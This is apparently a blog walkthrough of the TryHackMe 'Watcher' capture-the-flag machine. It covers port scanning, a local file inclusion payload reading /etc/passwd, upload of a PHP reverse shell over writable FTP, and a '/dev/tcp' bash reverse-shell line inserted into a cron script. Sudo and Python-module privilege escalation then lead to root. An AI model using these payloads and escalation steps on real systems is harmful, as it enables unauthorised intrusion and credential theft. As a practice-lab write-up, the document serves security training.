Watcher — TryHackMe

Write-up for Watcher — another TryHackeMe’s room which is a boot2root Linux machine utilizing web exploits along with some common privilege escalation techniques.This room can be found here:-

https://tryhackme.com/room/watcher

As usual, let’s start with our enumeration process with nmap.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.0.46

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.0.46 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 17:01 EST
Nmap scan report for 10.10.0.46
Host is up (0.071s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 19.84 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.46

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 17:03 EST
Nmap scan report for 10.10.0.46
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
| 256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_ 256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 26.60 ms 10.8.0.1
2 26.80 ms 10.10.0.46
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.21 seconds

So we have 3 open ports.Port 21: FTP has no anonymous access and vsftpd 3.0.3 has no know vulnerability. Port 22: SSH with version OpenSSH 7.6p1 also have no know vulnerabilities. We will explore Port 80 first and will try to brute force directories with ffuf.

FFUF

ffuf -u http://10.10.0.46/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.0.46/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.0.46/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
index.php [Status: 200, Size: 4826, Words: 1154, Lines: 135]
post.php [Status: 200, Size: 2422, Words: 465, Lines: 84]
css [Status: 301, Size: 306, Words: 20, Lines: 10]
images [Status: 301, Size: 309, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 69, Words: 4, Lines: 4]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 4826, Words: 1154, Lines: 135]
round.php [Status: 200, Size: 3440, Words: 488, Lines: 11]
bunch.php [Status: 200, Size: 3445, Words: 490, Lines: 11]
server-status [Status: 403, Size: 275, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 448 req/sec :: Duration: [0:32:45] :: Errors: 0 ::

Robots.txt

Exploring robots.txt via the web browser show us the following:

Flag1.txt

Opening http://10.10.0.46/flag_1.txt gives us our first flag.

The other file http://10.10.0.46/secret_file_do_not_read.txt access is forbidden. We will keep this in mind and carry on.

LFI

From the directory scan above we saw post.php which also have a parameter post.Checking this param for Local File Inclusion, we found that this is indeed vulnerable to LFI as we can read the /etc/passwd file like this:

http://10.10.31.251/post.php?post=../../../../../etc/passwd

Also noticed few user will,ftpuser,mat and toby from the password file. As we have another text file from above, we checked if we can read that file as well with LFI:

http://10.10.31.251/post.php?post=secret_file_do_not_read.txt

Indeed we can and that gave us ftp user named “ftpuser” and it’s password.

Flag2.txt

Login via the FTP with the credentials found above, we for our flag2.

The FTP directory found is also writable,so we can put a php reverse shell and open up a netcat session on our attacking machine and access the php reverse shell via the browser to get the reverse shell as shown below:

Upgrade Shell

Use the following command to make our reserve shell more stable:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Flag3.txt

We got our flag3 by searching for it on the file system:

find / -name flag_3.txt 2>/dev/null

Checking what commands the user “www-data” can run any other user with “sudo -l”:

Flag4.txt

So www-data can run anything as toby, why not run a bash shell as toby:

Indeed we can and we also found our flag4 in the home directory of user “toby”. The Note.txt here talks about a cronjob,so let’s check what all cronjobs are running:

This job is running as “mat” and we can edit /home/toby/jobs/cow.sh to get a reverse shell as user “mat”. Add the following line in cow.sh with the ip of our own attacking machine:

bash -i >& /dev/tcp/10.8.98.192/4444 0>&1

And after a minute or so we get a reverse shell:

Flag5.txt

We got the flag5 in user mat’s home directory:

Stabilize this shell also as we did earlier and check what “mat” can run with sudo -l:

So user “mat” can run a python script /home/mat/scripts/will_script.py as user will. In the script will_script.py “get_command” function is imported from python module cmd and the cmd module can be edited by user “mat”.So will will add the following code to the cmd.py script, will will just spawn a bash shell:

Flag6.txt

Now just running the will_script.py as:

sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1

gave us a bash shell for user “will” and we found our flag6 in the home directory of user “will”.

Uploaded the Linux Smart Enumeration script on the target and running it revealed a base64 encoded key on /opt/backups directory:

Decoded the key and found that it is a RSA private key.

Flag7.txt

We know from our enumeration that SSH is enabled, so let;s try this SSH key with root user to login on to the target:

We were able to login as root and we got our final flag7 in /root directory.

That it. Thanks for reading and have a nice day.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Peer to Peer Risk Assessment

Building New Python Project

How to Set Up Unit Testing for ASP.NET MVC Web API Controllers

Complete Machine Learning solution(Part 3|3): Deploy Flask application on AWS Elastic Beanstalk

Kotlin Channels Piping Generating Prime Number Illustrated

Use a dictionary instead of if -switch statements : C#, functional

How We Built a Low-Code Development Platform Generating a Downloadable Angular Code

“git rebase --onto” cheatsheet v2

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Throwback — Part 3 — LLMNR Poisoning

TryHackMe: Walking An Application Writeup

Walking an Application Logo at TryHackMe

TryHackme: GameBuzz

Mustacchio — TryHackMe CTF Walkthrough